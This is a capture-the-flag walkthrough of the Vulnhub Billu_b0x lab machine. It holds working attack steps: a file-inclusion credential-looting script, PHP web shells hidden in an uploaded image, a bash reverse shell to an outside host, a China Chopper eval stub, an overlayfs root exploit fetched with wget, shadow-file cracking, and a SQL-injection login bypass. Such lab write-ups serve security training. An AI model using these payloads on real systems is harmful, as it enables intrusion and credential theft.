Vulnhub Billu_b0x

1. Information gathering

1.1 Get the IP address:

Nmap scan report for 192.168.118.137
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 00:0C:29:69:99:DF (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1.2 Directory brute-force with dirb

root@kali:~# dirb "http://192.168.118.137" /usr/share/dirb/wordlists/big.txt -o  test.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

OUTPUT_FILE: test.txt
START_TIME: Tue Nov 20 09:41:59 2018
URL_BASE: http://192.168.118.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.118.137/ ----
+ http://192.168.118.137/add (CODE:200|SIZE:307)                               
+ http://192.168.118.137/c (CODE:200|SIZE:1)                                   
+ http://192.168.118.137/cgi-bin/ (CODE:403|SIZE:291)                          
+ http://192.168.118.137/head (CODE:200|SIZE:2793)                             
==> DIRECTORY: http://192.168.118.137/images/                                  
+ http://192.168.118.137/in (CODE:200|SIZE:47559)                              
+ http://192.168.118.137/index (CODE:200|SIZE:3267)                            
+ http://192.168.118.137/panel (CODE:302|SIZE:2469)                            
==> DIRECTORY: http://192.168.118.137/phpmy/                                   
+ http://192.168.118.137/server-status (CODE:403|SIZE:296)                     
+ http://192.168.118.137/show (CODE:200|SIZE:1)                                
+ http://192.168.118.137/test (CODE:200|SIZE:72)                               
==> DIRECTORY: http://192.168.118.137/uploaded_images/                         
                                                                               
---- Entering directory: http://192.168.118.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/ ----
+ http://192.168.118.137/phpmy/ChangeLog (CODE:200|SIZE:28878)                 
+ http://192.168.118.137/phpmy/LICENSE (CODE:200|SIZE:18011)                   
+ http://192.168.118.137/phpmy/README (CODE:200|SIZE:2164)                     
+ http://192.168.118.137/phpmy/TODO (CODE:200|SIZE:190)                        
+ http://192.168.118.137/phpmy/changelog (CODE:200|SIZE:8367)                  
==> DIRECTORY: http://192.168.118.137/phpmy/contrib/                           
+ http://192.168.118.137/phpmy/docs (CODE:200|SIZE:2781)                       
+ http://192.168.118.137/phpmy/export (CODE:200|SIZE:8367)                     
+ http://192.168.118.137/phpmy/favicon (CODE:200|SIZE:18902)                   
+ http://192.168.118.137/phpmy/favicon.ico (CODE:200|SIZE:18902)               
+ http://192.168.118.137/phpmy/import (CODE:200|SIZE:8367)                     
+ http://192.168.118.137/phpmy/index (CODE:200|SIZE:8367)                      
==> DIRECTORY: http://192.168.118.137/phpmy/js/                                
==> DIRECTORY: http://192.168.118.137/phpmy/libraries/                         
+ http://192.168.118.137/phpmy/license (CODE:200|SIZE:8367)                    
==> DIRECTORY: http://192.168.118.137/phpmy/locale/                            
+ http://192.168.118.137/phpmy/main (CODE:200|SIZE:8367)                       
+ http://192.168.118.137/phpmy/navigation (CODE:200|SIZE:8367)                 
+ http://192.168.118.137/phpmy/phpinfo (CODE:200|SIZE:8367)                    
+ http://192.168.118.137/phpmy/phpmyadmin (CODE:200|SIZE:42380)                
==> DIRECTORY: http://192.168.118.137/phpmy/pmd/                               
+ http://192.168.118.137/phpmy/print (CODE:200|SIZE:1064)                      
+ http://192.168.118.137/phpmy/robots (CODE:200|SIZE:26)                       
+ http://192.168.118.137/phpmy/robots.txt (CODE:200|SIZE:26)                   
==> DIRECTORY: http://192.168.118.137/phpmy/scripts/                           
==> DIRECTORY: http://192.168.118.137/phpmy/setup/                             
+ http://192.168.118.137/phpmy/sql (CODE:200|SIZE:8367)                        
==> DIRECTORY: http://192.168.118.137/phpmy/themes/                            
+ http://192.168.118.137/phpmy/url (CODE:200|SIZE:8367)                        
+ http://192.168.118.137/phpmy/webapp (CODE:200|SIZE:6917)                     
                                                                               
---- Entering directory: http://192.168.118.137/uploaded_images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/contrib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/pmd/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/setup/ ----
+ http://192.168.118.137/phpmy/setup/config (CODE:303|SIZE:0)                  
==> DIRECTORY: http://192.168.118.137/phpmy/setup/frames/                      
+ http://192.168.118.137/phpmy/setup/index (CODE:200|SIZE:12971)               
==> DIRECTORY: http://192.168.118.137/phpmy/setup/lib/                         
+ http://192.168.118.137/phpmy/setup/scripts (CODE:200|SIZE:5169)              
+ http://192.168.118.137/phpmy/setup/styles (CODE:200|SIZE:6941)               
+ http://192.168.118.137/phpmy/setup/validate (CODE:200|SIZE:10)               
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
---- Entering directory: http://192.168.118.137/phpmy/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Nov 20 09:42:34 2018
DOWNLOADED: 61374 - FOUND: 37

The brute-force turned up quite a bit of useful information:

1. http://192.168.118.137/test

2. http://192.168.118.137/phpmy/phpinfo

3. http://192.168.118.137/phpmy/phpmyadmin

2. Penetration testing

1. Visiting http://192.168.118.137/test shows a hint that a file parameter is expected:

2. Passing it via GET does not work, so test POST. Two commonly used ways to send the POST:

2.1 Hackbar

2.2 Burpsuite

Burpsuite: convert the GET request to POST:

Repeater > "Change request method"

3. This confirms a file inclusion (arbitrary file read) vulnerability. Download the other files found by dirb with the same POST:

add.php, in.php, c.php, index.php, show.php, panel.php

Code review of c.php reveals the MySQL username, password and database name:

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

The phpMyAdmin configuration can be read the same way and holds the root database credentials (the same password is reused for the system root account, as the john output in the addendum shows):

file=/var/www/phpmy/config.inc.php
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
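Automating the file-inclusion step above, as an added example that is not part of the original writeup: the script sends the same POST file=<path> request to /test for every file dirb found and pulls the mysqli_connect() and phpMyAdmin credentials out of the returned PHP source. The target URL, parameter name and the two credential formats come from the writeup; the /var/www document root, the phpmy/config.inc.php entry in the file list, and the embedded sample responses (copies of the two snippets quoted above, used only for offline runs) are assumptions. Standard library only.

```python
import re
import urllib.parse
import urllib.request

TARGET = "http://192.168.118.137/test"   # LFI endpoint from the writeup
WEBROOT = "/var/www"                      # assumed Apache document root

# Files dirb found, plus phpMyAdmin's config (assumed to live under /var/www/phpmy).
FILES = ["add.php", "in.php", "c.php", "index.php", "show.php", "panel.php",
         "phpmy/config.inc.php"]

# Credential formats seen in c.php and config.inc.php.
MYSQLI_RE = re.compile(
    r'mysqli_connect\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')
PMA_RE = re.compile(r"\$cfg\['Servers'\]\[\$i\]\['(user|password)'\]\s*=\s*'([^']*)'")

# Constructed sample responses (the two snippets quoted in the writeup) so the
# script can be exercised offline; a live run fetches the real files instead.
SAMPLE_SOURCES = {
    f"{WEBROOT}/c.php":
        b'<?php\n$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");\n?>',
    f"{WEBROOT}/phpmy/config.inc.php":
        b"$cfg['Servers'][$i]['user'] = 'root';\n$cfg['Servers'][$i]['password'] = 'roottoor';\n",
}


def build_request(path):
    """The POST the writeup sends from Burp Repeater: body file=<path>."""
    body = urllib.parse.urlencode({"file": path}).encode()
    return urllib.request.Request(
        TARGET, data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"})


class _Response:
    """Minimal stand-in for the object urlopen returns, used by offline_opener."""
    def __init__(self, data):
        self._data = data

    def read(self):
        return self._data

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False


def offline_opener(req):
    """Serve SAMPLE_SOURCES instead of talking to the network."""
    path = urllib.parse.parse_qs(req.data.decode())["file"][0]
    return _Response(SAMPLE_SOURCES.get(path, b"<?php ?>"))


def fetch(path, opener=urllib.request.urlopen):
    """Return the included file as text; `opener` is swappable for offline use."""
    with opener(build_request(path)) as resp:
        return resp.read().decode(errors="replace")


def extract_credentials(source):
    """Return (label, user, password) tuples found in PHP source text."""
    found = []
    for host, user, pw, db in MYSQLI_RE.findall(source):
        found.append((f"mysqli {host}/{db}", user, pw))
    pma = dict(PMA_RE.findall(source))
    if pma:
        found.append(("phpmyadmin", pma.get("user", ""), pma.get("password", "")))
    return found


def loot(opener=urllib.request.urlopen):
    """Fetch every file in FILES and collect credentials: {name: [creds]}."""
    results = {}
    for name in FILES:
        creds = extract_credentials(fetch(f"{WEBROOT}/{name}", opener))
        if creds:
            results[name] = creds
    return results


if __name__ == "__main__":
    for name, creds in loot().items():
        for label, user, pw in creds:
            print(f"{name}: {label} -> {user}:{pw}")
```

Run it with the box reachable to print the credentials live; `loot(opener=offline_opener)` exercises the same code path against the embedded samples.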

4. Log in to the database through http://192.168.118.137/phpmy/

Inside phpMyAdmin, the ica_lab database holds the web login credentials: biLLu:hEx_it

5. Log in to the web application and review its functionality:

show users

add user

There is an image upload feature; test whether a one-line PHP web shell can be uploaded.

3. Getting a shell

Append a one-line PHP web shell to an image file with notepad++:
<?php system($_GET['cmd']); ?>

Upload the image shell:

After a successful upload, access it:

Execute commands:

include($dir.'/'.$_POST['load']);   // in panel.php: include() executes any PHP inside the included file regardless of its extension, so the uploaded .jpg runs

POST /panel.php?cmd=cat%20/etc/passwd;ls HTTP/1.1
Host: 192.168.118.137
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.118.137/panel.php
Cookie: PHPSESSID=fpbnovc9pc3rlg2sfeies9j1f7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

load=/uploaded_images/muma.jpg&continue=continue

Run a reverse shell; the command goes in the cmd parameter and must be URL-encoded:
echo "bash -i >& /dev/tcp/192.168.118.128/4444 0>&1" | bash

nc catches the reverse shell:

Connecting with China Chopper (Caidao):
uploaded_images is writable, so drop a Chopper stub there (the PHP is wrapped in single quotes for the shell, so the array key uses double quotes):
echo '<?php eval($_POST["123456"]); ?>' >> caidao.php

4. Privilege escalation

Escalate to root:
www-data@indishell:/var/www$ cat /etc/issue
cat /etc/issue
Ubuntu 12.04.5 LTS \n \l

www-data@indishell:/var/www$ uname -a
uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
www-data@indishell:/var/www$

https://www.exploit-db.com/exploits/37292/
'overlayfs' Local Privilege Escalation - CVE-2015-1328 (this 3.13.0-32 Ubuntu kernel is affected)

wget https://www.exploit-db.com/download/37292.c
chmod 777 37292.c
gcc 37292.c -o exp
./exp

For Linux privilege escalation, see:

https://blog.csdn.net/qq_20307987/article/details/65443902

Note:

Choose the exploit according to the kernel and distribution version (here Ubuntu 12.04.5 LTS, kernel 3.13.0-32, i686).

Addendum:

The file inclusion also reads /etc/passwd and /etc/shadow, so the root password can be cracked directly (run john first; --show only prints what has already been cracked):

root@kali:~# unshadow passwd.txt shadow.txt > /tmp/unshadow.txt
root@kali:~# john --format=crypt /tmp/unshadow.txt
root@kali:~# john --format=crypt /tmp/unshadow.txt --show
root:roottoor:0:0:root:/root:/bin/bash

1 password hash cracked, 1 left

SQL injection:
index.php was obtained through the file inclusion in /test.
(1) Reviewing the index.php source shows the following filtering on the login fields:
$uname=str_replace('\'','',urldecode($_POST['un']));
$pass=str_replace('\'','',urldecode($_POST['ps']));
In PHP, '\'' inside a single-quoted literal is just a single quote character, so str_replace strips every ' from the input and nothing else; a backslash in the input survives. urldecode decodes the input first, so a %27 is stripped as well. index.php then concatenates the filtered values into the query, password literal first and username literal second: select * from auth where pass='...' and uname='...'.

(2) The usual login payload ' or 1=1 -- therefore fails: its quotes are removed and what remains stays inside the string literal. Appending \' makes the payload ' or 1=1 -- \' ; after filtering it becomes " or 1=1 -- \" with a trailing backslash. Submitted as both username and password, the backslash in the password copy escapes the quote that should close the password literal, so that literal runs on until the opening quote of the username; the username copy is then parsed as live SQL, or 1=1, followed by a comment that swallows the trailing \'. (Placed only in the username field, the same backslash leaves the last literal unterminated and the query errors, which is why the field matters.) Checking the filter in an online PHP sandbox:
<?php echo str_replace('\'','',' or 1=1 --\''); ?>
prints " or 1=1 --". Here the \' in the PHP source is itself only an escaped quote, so this demonstrates the quote being stripped, not a backslash being removed; the backslash in the POSTed payload is real data and is kept.
payload: ' or 1=1 -- \'
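To make the bypass concrete, the following added example (not from the original writeup) reproduces index.php's filter and query construction in Python and tokenizes the resulting SQL the way MySQL's lexer would, honouring \' escapes inside literals and -- comments. It shows the naive payload failing, the writeup's payload succeeding when it is sent in both fields, and the same payload producing an unterminated literal when it sits in only one of them. The query shape follows the index.php source; the tokenizer and the test payloads are constructed here.

```python
import urllib.parse


def php_filter(value):
    """
    Mirror of index.php: str_replace('\\'', '', urldecode($x)).
    In PHP the literal '\\'' is a one-character string containing a single
    quote, so only quotes are removed; a backslash in the input survives.
    urldecode also turns '+' into a space, hence unquote_plus.
    """
    return urllib.parse.unquote_plus(value).replace("'", "")


def build_query(un, ps):
    """Concatenation as in index.php: the password literal comes first."""
    return ("select * from auth where  pass='" + php_filter(ps)
            + "' and uname='" + php_filter(un) + "'")


def tokenize(sql):
    """
    Split SQL into ('code'|'str'|'comment', text) chunks the way MySQL's lexer
    sees it: a backslash escapes the next character inside a quoted string,
    '' is a doubled quote, and "-- " or "#" starts a comment to end of line.
    Raises ValueError when a string literal is never closed.
    """
    out, buf, i, n = [], "", 0, len(sql)
    while i < n:
        c = sql[i]
        if c == "'":
            if buf:
                out.append(("code", buf))
                buf = ""
            j, lit = i + 1, ""
            while j < n:
                if sql[j] == "\\" and j + 1 < n:            # escaped character
                    lit += sql[j:j + 2]
                    j += 2
                elif sql[j] == "'" and j + 1 < n and sql[j + 1] == "'":
                    lit += "''"                            # doubled quote
                    j += 2
                elif sql[j] == "'":
                    break                                  # closing quote
                else:
                    lit += sql[j]
                    j += 1
            if j >= n:
                raise ValueError("unterminated string literal: " + sql[i:])
            out.append(("str", lit))
            i = j + 1
        elif sql.startswith("-- ", i) or c == "#":
            if buf:
                out.append(("code", buf))
                buf = ""
            out.append(("comment", sql[i:]))
            i = n
        else:
            buf += c
            i += 1
    if buf:
        out.append(("code", buf))
    return out


def live_sql(sql):
    """The SQL that actually executes: code outside literals and comments."""
    return " ".join(" ".join(t for k, t in tokenize(sql) if k == "code").split())


def bypasses(un, ps):
    """True when 'or 1=1' reaches live SQL and the statement still lexes."""
    try:
        return "or 1=1" in live_sql(build_query(un, ps))
    except ValueError:
        return False


if __name__ == "__main__":
    naive = "' or 1=1 -- "
    payload = "' or 1=1 -- \\'"          # the writeup's payload
    cases = [("normal login", "admin", "secret"),
             ("naive payload, both fields", naive, naive),
             ("writeup payload, both fields", payload, payload),
             ("writeup payload, uname only", payload, "x"),
             ("writeup payload, pass only", "admin", payload),
             ("classic: ps=\\, un=or 1=1 -- -", " or 1=1 -- -", "\\")]
    for label, un, ps in cases:
        print(f"{label:34} bypass={bypasses(un, ps)!s:5} query={build_query(un, ps)}")
```

The tokenizer covers only the constructs this query needs (single-quoted literals, backslash and doubled-quote escapes, -- and # comments); it is a reasoning aid, not a full MySQL lexer.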
